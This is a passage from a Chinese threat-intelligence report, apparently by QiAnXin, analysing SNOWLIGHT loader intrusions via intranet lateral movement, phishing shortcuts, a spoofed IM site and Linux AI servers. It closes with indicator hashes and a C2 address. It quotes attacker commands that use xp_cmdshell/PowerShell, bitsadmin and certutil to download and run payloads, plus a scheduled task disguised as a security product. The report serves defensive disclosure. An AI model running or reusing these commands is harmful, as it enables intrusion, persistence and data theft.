border-box;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;sup&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 11px;box-sizing: border-box;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">[3]</span></sup><span leaf="">一文中提到SNOWLIGHT回连内网节点的情况，在2026年初我们在媒体行业观察到了相同的案例，攻击者在目标内网的服务器区通过反向代理建立了多个SNOWLIGHT节点，并在横向移动过程中请求内网节点下载BAT类型的SNOWLIGHT：</span></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">Cmd</span></span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">cmd.exe&#34; /c EXEC xp_cmdshell &#39;powershell -nop -w hidden -c &#34;$client = New-Object System.Net.WebClient; $client.DownloadFile(&#39;&#39;<a href="http://172.XX.XXX9:38087/swt" target="_blank">http://172.XX.XXX9:38087/swt</a>&#39;&#39;, &#39;&#39;C:\Users\Public\run.bat&#39;&#39;); Start-Process C:\Users\Public\run.bat&#34;&#39;;</span></span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">bitsadmin /transfer myjob /download /priority high <a href="http://172.XX.X.189:38087/swt" target="_blank">http://172.XX.X.189:38087/swt</a> C:\Users\Public\run.bat</span></span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">certutil.exe -urlcache -split -f &#34;<a href="http://172.XX.XX.24:8881/?h=172.XX.XX.24&amp;p=8881&amp;t=tcp&amp;a=w64&amp;stage=true" target="_blank">http://172.XX.XX.24:8881/?h=172.XX.XX.24&amp;p=8881&amp;t=tcp&amp;a=w64&amp;stage=true</a>&#34; &#34;C:\Users\Public\858f6b86tcp.exe&#34;</span></span></p></td></tr></tbody></table><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">内网SNOWLIGHT节点返回的banner信息如下：</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.04722222222222222" data-s="300,640" data-type="png" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100035120" src="https://wechat2rss.xlab.app/img-proxy/?k=7db39df2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FodcL3w4qOqicLwPIRz0VpSQ1RBjYyNgqzc85Jib1NxmbeMClIuSAKwrCDiclJqyHhoNzzZqYISibj5p4KSV7ZISK9CvicWHpX6vgiapy4kfcNB0nM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px 0px 8px;padding: 0px;box-sizing: border-box;"><span leaf="">经过分析攻击者通过SNOWLIGHT下载的payload类型如下：</span></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">文件名</span></span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">类型</span></span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">chr.exe</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">浏览器窃密插件</span></span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">fs.exe</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">Fscan内网扫描器</span></span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">rrq.exe</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">提权工具</span></span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">sanforV.exe</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">SharpWeb窃密工具</span></span></p></td></tr></tbody></table><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px 0px 8px;padding: 0px;box-sizing: border-box;"><span leaf="">涉及的PDB如下：</span></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">PDB</span></span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">D:\项目\武器化\内存加载PE\x64\Release\内存加载PE.pdb</span></span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">D:\soft1\soft\浏览器dump\SharpWeb-main - 副本\SharpWeb-main\SharpWeb\obj\Debug\SharpWeb.pdb</span></span></p></td></tr></tbody></table></div><div style="font-size: 16px;color: rgb(49, 94, 163);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">鱼叉邮件</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px 0px 8px;padding: 0px;box-sizing: border-box;"><span leaf="">通过lnk钓鱼的方式启动SNOWLIGHT:</span></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">Lnk</span></span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">XXXXXX技术学院机房项目&amp;.pdf.lnk</span></span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;font-weight: bold;">targetcmd</span></span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">C:\Windows\System32\rundll32.exe&#34; url.dll,FileProtocolHandler &#34;.\__MACOSA\__MACOSA\__MACOSA\__MACOSA\__MACOSA\__MACOSA\a.exe</span></span></p></td></tr></tbody></table><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">随后内存加载开源项目SharpHunter，收集运维终端本机信息：</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.33531510107015455" data-s="300,640" data-type="png" data-w="841" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100035121" src="https://wechat2rss.xlab.app/img-proxy/?k=a3be4efb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FodcL3w4qOq8gl4wLVvUMiaBPIliauqNpLYqq2aRD2AU0jvotgXm7BtvtZ1HHl9XsI1Y3sVCt3GCWTEsnnQdRWk1Ys1Uj1IGYJEUQZ0c8hu7cI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px 0px 8px;padding: 0px;box-sizing: border-box;"><span leaf="">并给SNOWLIGHT创建计划任务：</span></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">Cmd</span></span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">schtasks /create /tn &#34;奇安信天擎安全浏览器服务&#34; /tr &#34;\&#34;C:\Program Files\奇安信天擎安全浏览器\TQSecurityExplorer.exe\&#34;&#34; /sc onstart /ru</span></span></p></td></tr></tbody></table></div><div style="font-size: 16px;color: rgb(49, 94, 163);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">供应链水坑/仿冒水坑</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 8px 0px 0px;padding: 0px;box-sizing: border-box;"><span leaf="">除了本次披露的IM官网供应链之外，其还在仿冒一些私密IM官网，该活动可能与博彩业务有关。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4361111111111111" data-s="300,640" data-type="png" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100035122" src="https://wechat2rss.xlab.app/img-proxy/?k=8326c68d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOqic2dH2icYgggr6T4HUYYxWKLvtRbB50kiaFicugy6k0S5hpFJ7QrYqXv89At0sNeyqDBd3sPyIy64t828dOdhVibY0yDzibyiaibJLtzk%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">以本次供应链落地的木马为例，polymorphism.exe 运行后会读取 config.dat 并在内存中解密执行，经分析为4KB大小shellcode态的SNOWLIGHT。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.09543147208121827" data-s="300,640" data-type="png" data-w="985" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100035119" src="https://wechat2rss.xlab.app/img-proxy/?k=6885ef57&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOq9p7ZQSwRibARXKBSB4ibuEBjzBK0U2fiazkScmTkM2lGcmvCA4xkvKww1JYoUFzcUaRuxfCxT3iaibRfFK0VmZqcgF6Few454zibO9k%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">连接 18.179.119.184:80 下载后续载荷。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1323851203501094" data-s="300,640" data-type="png" data-w="914" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100035118" src="https://wechat2rss.xlab.app/img-proxy/?k=b8483767&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOq9nUAKCQNpfUGVxcibpzDVvoYZ1HF80Hsq9HbeMuJtPzhBCSrjq3rT2WjPI4MqLzeGh5amOHPe3WQ26k1PgGucFazRyXzuDVsKo%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">最终载荷为魔改的npm隧道，配置文件如下：</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.08055555555555556" data-s="300,640" data-type="png" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100035124" src="https://wechat2rss.xlab.app/img-proxy/?k=593688b3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FodcL3w4qOqib9xhH8Kh6VAVrPnicafSd73FxcoN1XIcobzO0KBwLh3obSodg3AnQwAdZZZCco5KE13dIYdLIdFETuWjsBE417gwP4jksEHIbU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: center;justify-content: center;margin: 30px 0% 10px;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;border-bottom: 17px solid rgb(240, 244, 255);border-bottom-right-radius: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0% -8px;box-sizing: border-box;"><div style="letter-spacing: 0px;line-height: 1;font-size: 16px;color: rgb(49, 94, 163);padding: 0px 5px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Linux平台事件</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Linux平台下针对AI类型的服务器通过爆破和漏洞作为攻击入口启动反弹shell后下载bash类型的SNOWLIGHT脚本。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6166097838452788" data-s="300,640" data-type="png" data-w="879" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100035126" src="https://wechat2rss.xlab.app/img-proxy/?k=5e97cf87&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOq8VnBviaicp5mcZlzrEOA0Arrhjx4VDC9Efib9jJXFOKulkVXtOiaUffurMkwZPjx4cCN6CXk3QlMH381iaxicrWSdibzWTicpNjrN2d4g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">下载elf类型的SNOWLIGHT，最终内存加载魔改npm隧道。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9583931133428981" data-s="300,640" data-type="png" data-w="697" type="block" data-imgfileid="100035135" src="https://wechat2rss.xlab.app/img-proxy/?k=2b68c47b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOq9nMA9icibsCJlGIqgZK4PRt84hVpfWZibtAooDcBqIX231lHSOVsKAWPdPK1mdnPUoNOJyWslA7ibNQPdMZKY27udX9B9EnFTJr3E%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.16296296296296298" data-s="300,640" data-type="png" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100035123" src="https://wechat2rss.xlab.app/img-proxy/?k=af8b07e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOq8KF1aISxqicjTsIEut8w8H0icUtV1crCyMLmBB1GlfRqicCDJMYUEiauBGkXvXVLXg90ODQDHU8S2n6AKCqZSP1fyg5x3VgI0piaaY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: left;margin: 10px 0%;display: flex;flex-flow: row;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="font-size: 20px;color: rgb(55, 113, 187);padding: 0px 3px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">总结</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">目前，基于奇安信威胁情报中心的威胁情报数据的全线产品，包括奇安信威胁情报平台（TIP）、天擎、天眼高级威胁检测系统、奇安信NGSOC、奇安信态势感知等，都已经支持对此类攻击的精确检测。</span></p></div><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.512962962962963" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100035134" src="https://wechat2rss.xlab.app/img-proxy/?k=1b83565e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FodcL3w4qOqichfTSsqxdTkjQe0tw0u2LI2RkI8rVJKl3xlM5JB5ayjRibalicYJL6HMOiabFSPsbrMLh29XxGsw7W4uvGej6X3IsiaIpa18SeS58%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="text-align: left;margin: 10px 0%;display: flex;flex-flow: row;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="font-size: 20px;color: rgb(55, 113, 187);padding: 0px 3px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">IOC</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf=""> FileHash-MD5:</span></strong></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""> df3bd55c46adbf13ae68b5a9b1da19a0</span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""> f7e32bac29d48021903a62e3c64ca84b</span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""> 45fec0b0e4c8b99a9719a9f153272494</span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""> 6c0b5793bf6074de94c13c23225573bd</span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""> b7b85cd03240cc51038adb027702ee22</span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""> 3720be773080e5ba3a366c90ba7513b8</span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf=""> C2:</span></strong></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""> 18.179.119.184:80</span></p></div><div style="text-align: left;margin: 10px 0%;display: flex;flex-flow: row;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="font-size: 20px;color: rgb(55, 113, 187);padding: 0px 3px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">参考链接</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""> [1].<a href="https://cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect" target="_blank">https://cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""> [2].<a href="https://mp.weixin.qq.com/s/qQw1DXE25Gkz_P8pEPVaHg" target="_blank">https://mp.weixin.qq.com/s/qQw1DXE25Gkz_P8pEPVaHg</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""> [3].<a href="https://ti.qianxin.com/blog/articles/operation-run-the-cyber-carnival-of-offshore-patriots-cn/" target="_blank">https://ti.qianxin.com/blog/articles/operation-run-the-cyber-carnival-of-offshore-patriots-cn/</a></span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: 40%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5" data-s="300,640" data-type="gif" data-w="480" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100035128" src="https://wechat2rss.xlab.app/img-proxy/?k=801dae3e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqib2zM950E4ABwz8kA9kE4twOkbfEALnhSQoRCImxYjZ4b8tSXlakNRLJ2EEXSQoVxOAubbqIYp9C8lrYeltiaicG1UicwWeeiarqYc%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div><div style="display: inline-block;vertical-align: middle;width: 60%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: right;font-size: 14px;box-sizing: border-box;"><p style="margin: 0px 0px 5px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><span style="color: rgb(55, 113, 187);box-sizing: border-box;"><span leaf="">阅读原文</span></span><span style="box-sizing: border-box;"><span leaf="">至</span><strong style="box-sizing: border-box;"><span leaf="">ALPHA 9.3</span></strong></span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">即刻助力威胁研判</span></p></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://ti.qianxin.com/">阅读原文</a></p>
